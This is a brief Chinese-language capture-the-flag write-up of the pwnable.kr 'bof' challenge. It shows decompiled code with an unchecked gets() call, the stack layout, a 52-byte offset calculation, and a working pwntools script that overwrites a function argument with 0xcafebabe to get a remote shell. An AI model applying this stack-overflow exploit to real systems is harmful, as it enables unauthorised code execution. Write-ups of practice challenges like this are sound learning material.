Running at : nc pwnable.kr 9000
IDA查看
1 unsigned int __cdecl func(int a1) 2 { 3 char s; // [esp+1Ch] [ebp-2Ch] 4 unsigned int v3; // [esp+3Ch] [ebp-Ch] 5 6 v3 = __readgsdword(0x14u); 7 puts("overflow me : "); 8 gets(&s);//未对输入长度进行限制,存在栈溢出 9 if ( a1 == 0xCAFEBABE ) 10 system("/bin/sh"); 11 else 12 puts("Nah.."); 13 return __readgsdword(0x14u) ^ v3; 14 }
查看栈,
1 -0000002C s db ? 2 -0000002B db ? ; undefined 3 -0000002A db ? ; undefined 4 -00000029 db ? ; undefined 5 -00000028 db ? ; undefined 6 -00000027 db ? ; undefined 7 -00000026 db ? ; undefined 8 -00000025 db ? ; undefined 9 -00000024 db ? ; undefined 10 -00000023 db ? ; undefined 11 -00000022 db ? ; undefined 12 -00000021 db ? ; undefined 13 -00000020 db ? ; undefined 14 -0000001F db ? ; undefined 15 -0000001E db ? ; undefined 16 -0000001D db ? ; undefined 17 -0000001C db ? ; undefined 18 -0000001B db ? ; undefined 19 -0000001A db ? ; undefined 20 -00000019 db ? ; undefined 21 -00000018 db ? ; undefined 22 -00000017 db ? ; undefined 23 -00000016 db ? ; undefined 24 -00000015 db ? ; undefined 25 -00000014 db ? ; undefined 26 -00000013 db ? ; undefined 27 -00000012 db ? ; undefined 28 -00000011 db ? ; undefined 29 -00000010 db ? ; undefined 30 -0000000F db ? ; undefined 31 -0000000E db ? ; undefined 32 -0000000D db ? ; undefined 33 -0000000C var_C dd ? 34 -00000008 db ? ; undefined 35 -00000007 db ? ; undefined 36 -00000006 db ? ; undefined 37 -00000005 db ? ; undefined 38 -00000004 db ? ; undefined 39 -00000003 db ? ; undefined 40 -00000002 db ? ; undefined 41 -00000001 db ? ; undefined 42 +00000000 s db 4 dup(?) 43 +00000004 r db 4 dup(?) 44 +00000008 arg_0 dd ? 45 +0000000C 46 +0000000C ; end of stack variables
0x2c+8 =0x34=52,来到arg_0的存储空间
exp:
1 from pwn import * 2 3 r = remote('pwnable.kr','9000') 4 5 buf = 52 * 'A' 6 buf += p32(0xcafebabe) 7 8 r.sendline(buf) 9 10 r.interactive()